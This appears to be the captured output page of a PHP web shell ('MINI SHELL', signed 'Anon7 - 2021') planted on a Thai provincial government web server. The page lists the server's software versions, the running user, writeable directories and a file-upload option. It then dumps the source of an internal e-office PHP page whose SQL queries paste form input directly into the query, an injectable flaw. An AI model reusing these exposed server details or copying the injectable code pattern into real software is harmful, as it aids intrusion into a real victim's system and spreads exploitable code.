MINI SHELL

Server : Apache/2.2.2 (Fedora)
System : Linux App1.pathumtani.go.th 2.6.20-1.2320.fc5smp #1 SMP Tue Jun 12 19:40:16 EDT 2007 i686
User : apache ( 48)
PHP Version : 5.2.9
Disable Function : NONE
Directory :  /var/www/html/eoffice/application/document/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /var/www/html/eoffice/application/document/active_circular_g.php
<?
session_start();
//$bypass=1;

include("../../config/config.inc.php");
$db_mode="self";

?>
<SCRIPT language="javascript">
function mOvr(src,clrOver){ 
if (!src.contains(event.fromElement)) src.bgColor = clrOver; 
} 

function mOut(src,clrIn){ 
if (!src.contains(event.toElement)) src.bgColor = clrIn; 
} 

function showEle(divname){
if(document.getElementById(divname).style.display == 'none'){
document.getElementById(divname).style.display = 'block';
} else {  
document.getElementById(divname).style.display = 'none';
}
}

function  checkEle(divname){
//alert(document.post.getting.length);
if(document.post.getting.selectedIndex== document.post.getting.length-1){
document.getElementById(divname).style.display = 'block';
}else
{
document.getElementById(divname).style.display = 'none';
}

}
function  openEle(divname){
document.getElementById(divname).style.display = 'block';
}
function  closeEle(divname){
document.getElementById(divname).style.display = 'none';
}

</SCRIPT>

<?

if ($_SERVER[REQUEST_METHOD] == "POST"){ 
//	print_r($_POST);

$xtype=""; $a=0;
if($_POST[checkbox]){
	foreach ( $_POST[checkbox] as $num )
	{
			  $xtype.=$num.",";
			  if($a==0){  $select_code.="AND ( ";   }else{  $select_code.=" OR ";    }$a++;
			  $select_code.=" $table_staffgroup.gid =  $num";
	}
	$select_code.=")";


	//AND $table_staffgroup.parent !=  '0'
	$sql_check_group="
	SELECT
	$table_staffgroup.groupname,
	$table_staffgroup.gid
	FROM
	$table_staffgroup 
	WHERE
	$table_staffgroup.org_id =  '2'
	$select_code
	ORDER by $table_staffgroup.groupname ASC
	";
	$show_gid="";
	$resultg = mysql_query($sql_check_group)or die("Query line " . __LINE__ . " error<hr>".mysql_error());
	$a=0;
	while($rs_glist = mysql_fetch_assoc($resultg)){
	 if($i>0){  $show_gid.=" , ";    }$i++;
	$show_gid.=$rs_glist[groupname];
	}
	$_SESSION[session_ag][$id] = $xtype;
}


$select_code="";
$xtypep=""; $a=0;
if($_POST[checkboxp]){
	foreach ( $_POST[checkboxp] as $num )
	{
			  $xtypep.=$num.",";
			  if($a==0){  $select_code.="AND ( ";   }else{  $select_code.=" OR ";    }$a++;
			  $select_code.=" $profile_staffgroup.gid =  $num";
	}
	$select_code.=")";

//AND $table_staffgroup.parent !=  '0'
$sql_check_group="
SELECT
$profile_staffgroup.groupname,
$profile_staffgroup.gid
FROM
$profile_staffgroup 
WHERE
$profile_staffgroup.org_id = '2'
$select_code
ORDER by $profile_staffgroup.groupname ASC
";
$resultg = mysql_query($sql_check_group)or die("Query line " . __LINE__ . " error<hr>".mysql_error());

while($rs_glist = mysql_fetch_assoc($resultg)){
 if($i>0){  $show_gid.=" , ";    }$i++;
$show_gid.=$rs_glist[groupname];

}
$_SESSION[session_agp][$id] = $xtypep;
}
// if($type=="get"){
?>
<SCRIPT language="javascript">
var xvar = new Array('<? echo substr($xtype,0,-1); ?>');
var pvar = new Array('<? echo substr($xtypep,0,-1); ?>');
opener.document.post.pid.value=pvar;
opener.document.post.pid_hide.value="<?=$show_gid?>";

	if(opener.document.post.pid_hide.value!=""){
		opener.document.post.gid_show.value=opener.document.post.pid_hide.value
	}
	 if(opener.document.post.sid_hide.value!=""){
		opener.document.post.gid_show.value=opener.document.post.sid_hide.value;
	}
	if(opener.document.post.pid_hide.value!="" & opener.document.post.sid_hide.value!=""){
		opener.document.post.gid_show.value=opener.document.post.pid_hide.value+' , '+opener.document.post.sid_hide.value;
	}

 window.close();
</SCRIPT>
<?
}
?>










<HTML>
<HEAD>
<TITLE> àÅ×Í¡ Profile ¡ÅØèÁ§Ò¹ </TITLE>
<META http-equiv="Content-Type" content="text/html; charset=windows-874">
<SCRIPT type="text/javascript" src="dtree/dtree.js"></SCRIPT>
<SCRIPT src="../../common/functions.js" type="text/javascript" language="javascript"></SCRIPT>
<LINK href="../../common/style_menu.css" rel=StyleSheet type="text/css">
<LINK href="../../common/dtree.css" rel="StyleSheet" type="text/css"  />
<LINK href="../../common/style.css" rel="stylesheet" type="text/css">
</HEAD>
<BODY bgcolor="#FFFFFF">
<FORM action="<?=$PHP_SELF?>?type=<?=$type?>&action=add" name="post" method="post" enctype="multipart/form-data" onSubmit="return check();">
<TABLE width="101%" border="0" align="right" cellpadding="10" cellspacing="0">
<TR>
<TD height="18">


<TABLE width="100%" border="1" cellpadding="0" cellspacing="0" bordercolor="#CCCCCC">
	<TR>
		<TD>
		
		
<TABLE width="100%" border="0" cellspacing="1" cellpadding="1">
			<TR>
				<TD bgcolor="#CCCCCC"><TABLE width="100%" border="0" cellspacing="0" cellpadding="0">
						<TR>
							<TD><STRONG>WORKing GROUP</STRONG></TD>
							<TD align="right" valign="baseline"><INPUT name="id" type="hidden" id="id"  readonly="readonly" value="<?=$id?>"/>
								<INPUT type="submit" name="Button" value="ºÑ¹·Ö¡¢éÍÁÙÅ" onClick="sendvalue();"></TD>
						</TR>
					</TABLE>
					
		</TD>
	</TR>


<?	
$check_c=explode(",",$_SESSION[session_agp][$id]);
foreach($check_c as $num => $val)
{
if($val) { $ch[$val]="on";} 
}

$sql_groupmember="
SELECT
$table_staff.prename,
$table_staff.staffname,
$table_staff.staffsurname,
$profile_groupmember.staffid,
$profile_groupmember.gid
FROM
$table_staff
Inner Join $profile_groupmember  ON $profile_groupmember.staffid = $table_staff.staffid
WHERE
$table_staff.username NOT LIKE  'admin_%'
";			
$result = mysql_query($sql_groupmember)or die("Query line " . __LINE__ . " error<hr>".mysql_error());
while($rs_list = mysql_fetch_assoc($result)){
$list[$rs_list[gid]][$rs_list[staffid]]=$rs_list[prename].$rs_list[staffname]." ".$rs_list[staffsurname];

}	
// echo "<pre>";
// print_r($list);	
			
			
//AND$table_staffgroup .parent !=  '0'
$sql_group="
SELECT
$profile_staffgroup .groupname,
$profile_staffgroup .gid
FROM
$profile_staffgroup 
WHERE
$profile_staffgroup .org_id =  '2'
AND $profile_staffgroup.staffid='$session_staffid'
ORDER by binary($profile_staffgroup.groupname) ASC
";
$result = mysql_query($sql_group)or die("Query line " . __LINE__ . " error<hr>".mysql_error());
while($hrs = mysql_fetch_assoc($result)){
	
 if($list[$hrs[gid]]) {
?>			
	<TR>
		<TD align="left" valign="top">
			<INPUT type="checkbox" name="checkboxp[<?=$hrs[gid]?>]" value="<?=$hrs[gid]?>" <? if(($ch[$hrs[gid]]=="on")||($pid_check[$hrs[gid]])) {echo " checked ";} ?>>
					<LABEL <? if($list[$hrs[gid]]){ ?>onClick="showEle('displayp<?=$hrs[gid]?>');" <?}?>>
					<u style='cursor: hand;'><?=$hrs[groupname]?></u></LABEL>
					
					<?					
					if($list[$hrs[gid]]){
					?>
					<? $g_check="none"; ?>
					<DIV id="displayp<?=$hrs[gid]?>" NAME="displayp<?=$hrs[gid]?>" style="display:<?=$g_check?>;">
					
					<TABLE width="80%" border="0" cellspacing="0" cellpadding="0">
						<TR>
							<TD width="20">&nbsp;</TD>
							<TD>
							
							
							<TABLE width="100%" border="1" cellpadding="0" cellspacing="0" bordercolor="#EFEFEF" bgcolor="#FFFFDF">
								<TR>
									<TD>
									<?
									
										foreach($list[$hrs[gid]] as $sid => $name )
										{
											echo "&nbsp;&nbsp;&nbsp;&nbsp;$name <br>";
										}
									?>							</TD>
								</TR>
							</TABLE>							</TD>
						</TR>
					</TABLE>
					<? }?>
					</DIV>					
					
					</TD>
			</TR>
<? }  }?>
		</TABLE>
		
		</TD>
	</TR>
</TABLE>


</TD>
</TR>  
</TABLE>
</FORM>
</BODY>
</HTML>

Anon7 - 2021